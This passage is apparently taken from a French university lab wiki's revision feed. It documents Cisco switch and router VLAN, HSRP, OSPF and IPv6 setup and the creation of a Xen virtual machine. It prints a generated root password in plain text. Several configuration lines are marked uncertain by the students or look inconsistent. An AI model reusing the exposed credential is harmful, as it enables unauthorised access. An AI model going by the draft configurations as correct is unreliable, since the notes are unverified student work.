|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Commutateur&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Router&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour la borne wifi =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    //Rendre accessible la modification du port&lt;br /&gt;
    switchport trunk encapsulation dot1q   //Encapsule avec la trame le numéro du Vlan associé, ce qui permettra de d'avoir de quel équipement viens le paquet ainsi la réponse sera dirigé vers le bon port&lt;br /&gt;
    switchport mode trunk   //Configure le port du switch en mode trunk, ce qui permets de ne pas avoir de restriction sur les Vlan, tous les Vlan peuvent passer à travers ce port&lt;br /&gt;
    no shut    //Démarre le port ou de le garder actif&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour Corduan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal&lt;br /&gt;
    interface XXXX&lt;br /&gt;
    switchport&lt;br /&gt;
    switchport mode access //Rendre modifiable le port&lt;br /&gt;
    switchport access vlan42 //Autoriser le vlan 42 à transister à travers ce port&lt;br /&gt;
    no shutdown&lt;br /&gt;
    exit&lt;br /&gt;
    exit &lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour le router =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour l'autre commutateur =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création des Vlan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 42&lt;br /&gt;
    name Corduan&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 2 à 7&lt;br /&gt;
    name groupe 1 à 6&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 130&lt;br /&gt;
    name interconnexion&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
Pour supprimer un vlan il suffit de faire :&lt;br /&gt;
    no vlan X&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E304 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyACM0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexion&lt;br /&gt;
&lt;br /&gt;
  enable                                                  &lt;br /&gt;
 &lt;br /&gt;
  configure terminal&lt;br /&gt;
 &lt;br /&gt;
  interface XXXX                         &lt;br /&gt;
  no ip address                            //Pas d'addresse IP associé&lt;br /&gt;
  negotiation auto                         //Détermine automatiquement la vitesse de transfert&lt;br /&gt;
  media-type RJ45                          //Type de connexion (ici RJ45)&lt;br /&gt;
&lt;br /&gt;
Voici les vlan associé à nos groupes :&lt;br /&gt;
 &lt;br /&gt;
  service instance 2 ethernet              // création d'un vlan 2 dans cette interface&lt;br /&gt;
  encapsulation dot1q 2                    // Permets d'assurer une continuité d'un VLAN issue d'un switch sur un routeur via un lien trunk&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric      // retire le tag du vlan &lt;br /&gt;
  bridge-domain 2                          //création d'un bridge domaine interface (BDI) attribué au chiffre 2&lt;br /&gt;
    &lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
  encapsulation dot1q 3&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 3&lt;br /&gt;
    &lt;br /&gt;
  service instance 4 ethernet&lt;br /&gt;
  encapsulation dot1q 4&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 4&lt;br /&gt;
  &lt;br /&gt;
  service instance 5 ethernet&lt;br /&gt;
  encapsulation dot1q 5&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 5&lt;br /&gt;
    &lt;br /&gt;
  service instance 6 ethernet&lt;br /&gt;
  encapsulation dot1q 6&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 6&lt;br /&gt;
  &lt;br /&gt;
  service instance 7 ethernet&lt;br /&gt;
  encapsulation dot1q 7&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 7&lt;br /&gt;
&lt;br /&gt;
Voici le vlan associé à l'interconnexion :&lt;br /&gt;
 &lt;br /&gt;
  service instance 42 ethernet&lt;br /&gt;
  encapsulation dot1q 42&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 42&lt;br /&gt;
&lt;br /&gt;
======  Vers le SR 32 ======&lt;br /&gt;
  interface XXXX                        &lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 130 ethernet&lt;br /&gt;
  encapsulation dot1q 130&lt;br /&gt;
  bridge-domain 130&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
===== Configuration des BDI =====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   interface BDI2&lt;br /&gt;
   ip address 10.60.1.254 255.255.255.000           //Attribut l'addresse IPV4 pour le routeur ainsi que son mask&lt;br /&gt;
   standby version 2                                //Activation du HSRP (Host service Routing protocole) version 2 plus stable que la 1&lt;br /&gt;
   standby 3 ip 10.60.1.252                       //Donne l'addresse  IPV4 du routeur virtuelle pour le HSRP                             &lt;br /&gt;
   standby 3 preempt                              // Activation du HSRP         &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64      //Attribut l'addresse IPV6                             &lt;br /&gt;
   ipv6 enable                                      //Active l'addressage IPV6                              &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              &lt;br /&gt;
   ipv6 nd router-preference high                    //IPV6 sera la route de préférence par défaut avec une forte probabilitée&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI3&lt;br /&gt;
   ip address 10.60.2.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252                                                     &lt;br /&gt;
   standby 3 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                       &lt;br /&gt;
   &lt;br /&gt;
   interface BDI4&lt;br /&gt;
   ip address 10.60.3.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252                                                     &lt;br /&gt;
   standby 4 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI5&lt;br /&gt;
   ip address 10.60.4.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252                                                    &lt;br /&gt;
   standby 5 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI6&lt;br /&gt;
   ip address 10.60.5.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit  &lt;br /&gt;
   &lt;br /&gt;
   interface BDI7&lt;br /&gt;
   ip address 10.60.6.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.6.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B7::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B7::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                                 &lt;br /&gt;
 &lt;br /&gt;
   interface BDI42&lt;br /&gt;
   ip address 193.48.57.173 255.255.255.240         &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 193.48.57.172                                                     &lt;br /&gt;
   standby 7 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900                               &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI130&lt;br /&gt;
   ip address 192.168.222.1 255.255.255.248                      &lt;br /&gt;
   ipv6 address FE80::42:2 link-local                                         &lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
Se le faire expliquer parce que rien compris &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.1   //Doute voir avec Redon !&lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
Question pour Redon addresse Ip à définir &lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   int XXXX&lt;br /&gt;
   ip address 10.10.10.2 255.255.255.0&lt;br /&gt;
   vrrp 1 ip 10.10.10.3                     &lt;br /&gt;
   vrrp 1 preempt                          //Activation de la préemption, si jamais le routeur tombe en panne, l'autre prend sa place&lt;br /&gt;
   vrrp 1 priority 100                     //Dans le vvrp n°1 on définit la priorité à 100, plus la priorité est élevé plus il sera sollicité&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E306 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexio&lt;br /&gt;
&lt;br /&gt;
*******************************************************************************&lt;br /&gt;
&lt;br /&gt;
*******************************************************************************&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
Se le faire expliquer parce que rien compris &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.1   //Doute voir avec Redon !&lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;/div&gt;</summary>
		<author><name>Pcoint</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51258</id>
		<title>TP sysres IMA2a5 2019/2020 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51258"/>
				<updated>2019-11-28T09:54:32Z</updated>
		
		<summary type="html">&lt;p&gt;Pcoint : /* Sécurisation de données */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Fichier:Rex4ever.PNG|500px|right|frameless|© Copyright Ginette]]&lt;br /&gt;
== Accueil/Descriptif du groupe ==&lt;br /&gt;
Bienvenue sur la page du groupe 3. Le découpage en groupe par numéro permet de se repérer plus facilement dans l'adressage des différents réseaux nécessaire.Ce groupe est constitué de :&lt;br /&gt;
&lt;br /&gt;
*Pascal Coint&lt;br /&gt;
*Quentin Weisbecker&lt;br /&gt;
&lt;br /&gt;
Ce TP consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous avons à installer une machine virtuelle Xen avec l'OS Devian ainsi qu'implanter un auto-commutateur et un point d'accès. Nous effectuerons pas la suite des tests d'intrusion sur ces points d'accès afin de voir la vulnérabilité des différents protocoles de clé. Pour notre cas, nous nous étendrons sur les protocoles [https://fr.wikipedia.org/wiki/Wired_Equivalent_Privacy WEP] et [https://fr.wikipedia.org/wiki/Wi-Fi_Protected_Access WPA]-PSK.&lt;br /&gt;
&lt;br /&gt;
== Informations importantes == &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|4&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|10.60.3.0/24 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60B3::/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de l'ordinateur portable&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Requin&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Repérage à l'étiqueteuse&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|IMA2A5 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth03&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== La machine Virtuelle sous XEN : ima2a5-rex4ever ==&lt;br /&gt;
=== Note importante ===&lt;br /&gt;
Comme indiqué dans le sujet, nous allons créer une machine virtuelle via l'utilitaire [https://wiki.xenproject.org/wiki/Xen_Project_4.11_Man_Pages Xen] Linux sur le '''dom0 cordouan.insecserv.deule.net''' via la commande '''ssh''' et le compte administrateur usuel.Sur notre machine virtuelle nous créerons par la suite un compte pifou et un compte root identique au Zabeth.&lt;br /&gt;
&lt;br /&gt;
      Installation Summary&lt;br /&gt;
      ---------------------&lt;br /&gt;
      Hostname        :  ima2a5-rex4ever&lt;br /&gt;
      Distribution    :  ascii&lt;br /&gt;
      MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
      IP Address(es)  :  dynamic&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
      Root Password   :  sZzrYYPFZEwxsfmFghddGW5&lt;br /&gt;
&lt;br /&gt;
=== Création de notre machine virtuelle XEN ===&lt;br /&gt;
Après s'être connecté, il faut maintenant creer la machine virtuelle :      &lt;br /&gt;
      xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
L'installation se lance alors :&lt;br /&gt;
&lt;br /&gt;
      root@cordouan:~# xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
      Use of uninitialized value within %DIST in pattern match (m//) at /usr/bin/xen-create-image line 1803.&lt;br /&gt;
      &lt;br /&gt;
      General Information&lt;br /&gt;
      --------------------&lt;br /&gt;
      Hostname       :  ima2a5-rex4ever&lt;br /&gt;
      Distribution   :  ascii&lt;br /&gt;
      Mirror         :  http://fr.deb.devuan.org/merged/&lt;br /&gt;
      Partitions     :  swap            512M  (swap)&lt;br /&gt;
                        /               4G    (ext4)&lt;br /&gt;
      Image type     :  sparse&lt;br /&gt;
      Memory size    :  256M&lt;br /&gt;
      Kernel path    :  /boot/vmlinuz-4.9.0-6-amd64&lt;br /&gt;
      Initrd path    :  /boot/initrd.img-4.9.0-6-amd64&lt;br /&gt;
      &lt;br /&gt;
      Networking Information&lt;br /&gt;
      ----------------------&lt;br /&gt;
      IP Address     : DHCP [MAC: xxxxxxx]&lt;br /&gt;
      &lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating swap on /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating ext4 filesystem on /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      Installation method: debootstrap&lt;br /&gt;
&lt;br /&gt;
L'installation peut sembler bloquer sur cette dernière ligne mais il est possible de voir ce qui se passe en arrière plan via un second terminal en SSH et la commande SSH&lt;br /&gt;
      tail -f /var/xen-tools/ima2a5-rex4ever.log&lt;br /&gt;
&lt;br /&gt;
=== Ajout du bridge à ima2a5-rex4ever.cfg ===&lt;br /&gt;
Dans un premier lieu, on regarde l'existence du brige sur l'hote distant via : &lt;br /&gt;
      brctl show&lt;br /&gt;
Ce qui nous retourne : &lt;br /&gt;
      bridge name	bridge id		STP enabled	interfaces&lt;br /&gt;
      IMA2a5		8000.000af75e3dc0	no		eth1&lt;br /&gt;
      eth2&lt;br /&gt;
      if3.0&lt;br /&gt;
      IMA5sc		8000.000af75e3dc2	no		eth3&lt;br /&gt;
      eth5&lt;br /&gt;
      Insecure		8000.c81f66c22b83	no		vlan6&lt;br /&gt;
      L3MRIT		8000.000af763ae2d	no		eth4&lt;br /&gt;
      StudentsInfo		8000.c81f66c22b83	no		vlan50&lt;br /&gt;
On voit bien l'existence du bridge '''IMA2a5''', il faut donc l'ajouter à notre .cfg qui est le fichier de configuration de la VM ('''/etc/xen/ima2a5-rex4ever.cfg''')&lt;br /&gt;
et on modifie la ligne commençant par '''vif =''' et on ajoute le bridge de la manière suivante : &lt;br /&gt;
      vif = ['MAC:xxxxx,bridge = IMA2a5']&lt;br /&gt;
Après avoir modifié ce fichier, il faut le parser : xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
Une erreur '''NUMA placement failed, performance might be affected''' peut apparaître mais elle indique juste que xen n'arrive pas à disposer les VM comme il veut sur les procs, mais cela n'impactera que les performances nous passons outre ce problème.&lt;br /&gt;
&lt;br /&gt;
=== Démarrer la VM et accès console ===&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl console ima2a5-rex4ever&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). Après nous être logué,on change le mot de passe qui devient le même que le mot de passe du root de '''corduan''' ou d'une zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Montage des répertoires /var et /home ===&lt;br /&gt;
==== Creation des disques logique ====&lt;br /&gt;
Il faut d'abord créer les partitions logiques sur corduan via : &lt;br /&gt;
     lvcreate -L10G -n ima2a5-rex4ever-home virtual&lt;br /&gt;
     lvcreate -L10G -n ima2a5-rex4ever-var virtual&lt;br /&gt;
Il est possible qu'il affiche l'avertissement suivant : '''WARNING: ext2 signature detected on /dev/virtual/ima2a5-rex4ever-home at offset 1080. Wipe it? [y/n]'''&lt;br /&gt;
repondre alors oui(y).&lt;br /&gt;
Il est possible de verifier que votre partition a bien été crée via la commande :&lt;br /&gt;
      lvdisplay&lt;br /&gt;
On obtient alors dans la liste de toutes les partitions, nous deux partitions précedemment créées&lt;br /&gt;
      --- Logical volume ---&lt;br /&gt;
      LV Path                '''/dev/virtual/ima2a5-rex4ever-home'''&lt;br /&gt;
      LV Name                ima2a5-rex4ever-home&lt;br /&gt;
      VG Name                virtual&lt;br /&gt;
      LV UUID                mhJqFx-zO1m-PlOU-Zmeu-8NGx-7UUO-c2g9dP&lt;br /&gt;
      LV Write Access        read/write&lt;br /&gt;
      LV Creation host, time cordouan, 2019-11-08 08:47:26 +0000&lt;br /&gt;
      LV Status              available&lt;br /&gt;
      # open                 0&lt;br /&gt;
      LV Size                10.00 GiB&lt;br /&gt;
      Current LE             2560&lt;br /&gt;
      Segments               1&lt;br /&gt;
      Allocation             inherit&lt;br /&gt;
      Read ahead sectors     auto&lt;br /&gt;
      - currently set to     256&lt;br /&gt;
      Block device           254:3&lt;br /&gt;
     --- Logical volume ---&lt;br /&gt;
     LV Path                '''/dev/virtual/ima2a5-rex4ever-var'''&lt;br /&gt;
     LV Name                ima2a5-rex4ever-var&lt;br /&gt;
     VG Name                virtual&lt;br /&gt;
     LV UUID                9Bnl6S-6CE5-CtO2-hD8f-RidD-sps5-b1mrWg&lt;br /&gt;
     LV Write Access        read/write&lt;br /&gt;
     LV Creation host, time cordouan, 2019-11-08 08:50:57 +0000&lt;br /&gt;
     LV Status              available&lt;br /&gt;
     # open                 0&lt;br /&gt;
     LV Size                10.00 GiB&lt;br /&gt;
     Current LE             2560&lt;br /&gt;
     Segments               1&lt;br /&gt;
     Allocation             inherit&lt;br /&gt;
     Read ahead sectors     auto&lt;br /&gt;
     - currently set to     256&lt;br /&gt;
     Block device           254:4&lt;br /&gt;
Il faut maintenant faire pointer le système de fichier sur nos deux nouveaux repertoires pour finir la création : &lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-home&lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-var&lt;br /&gt;
Nos deux disques sont maintenant prêt, il ne reste plus qu'a les connecter avec la VM. Pour cela, il faut modifier le '''.cfg''' de nouveau.&lt;br /&gt;
&lt;br /&gt;
==== Modification du fichier de configuration ====&lt;br /&gt;
Retournons donc dans le fichier '''/etc/xen/ima2a5-rex4ever.cfg''' et dans la section disk modifier tel que : &lt;br /&gt;
&lt;br /&gt;
     disk    	= [&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/disk.img,xvda2,w',&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/swap.img,xvda1,w',               &lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-home,xvdb1,w',&lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-var,xvdb2,w',&lt;br /&gt;
                  ]&lt;br /&gt;
&lt;br /&gt;
Pour prendre effet il faut redémarrer la VM à l'aide des commandes&lt;br /&gt;
    xl shutdown ima2a5-rex4ever&lt;br /&gt;
    xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
&lt;br /&gt;
==== Configuration pour forcer le montage à chaque démarrage de la VM ====&lt;br /&gt;
Il faut ensuite aller dans la VM dans '''/etc/fstab''' et ajouter &lt;br /&gt;
    /dev/xvdb1		/home		ext4		defaults				0		2&lt;br /&gt;
    #/dev/xvdb2		/var		ext4		defaults				0		2&lt;br /&gt;
&lt;br /&gt;
Ces deux lignes permettent d'assurer que les 2 disques /var et /home soient pris en compte au démarrage de la VM.('''ATTENTION POUR LE MOMENT BIEN LAISSER # DEVANT LA 2eme LIGNE''')&lt;br /&gt;
Relancer la machine comme précédemment expliqué et testé que le /home fonctionne.&lt;br /&gt;
